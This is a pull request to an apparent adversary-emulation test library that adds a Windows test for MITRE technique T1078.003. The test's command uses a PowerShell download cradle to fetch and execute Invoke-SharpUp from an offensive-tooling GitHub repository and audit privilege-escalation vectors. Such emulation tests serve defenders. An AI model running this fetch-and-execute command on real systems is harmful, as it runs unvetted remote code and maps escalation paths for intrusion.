### PR TITLE
Update T1078.003.yaml

### DIFF
--- a/atomics/T1078.003/T1078.003.yaml
+++ b/atomics/T1078.003/T1078.003.yaml
@@ -45,3 +45,4 @@ atomic_tests:
     command: |-
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
       Invoke-SharpUp -command "audit"
+    name: powershell

--- a/atomics/T1078.003/T1078.003.yaml
+++ b/atomics/T1078.003/T1078.003.yaml
@@ -37,3 +37,11 @@ atomic_tests:
       sudo dscl . -delete /Users/AtomicUser
     name: bash
     elevation_required: true
+- name: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
+  description: PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Extend timeout to 300 seconds
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
+      Invoke-SharpUp -command "audit"


### PR DESCRIPTION
**Details:**
PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Extend timeout to 300 seconds

**Testing:**
windows 10

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->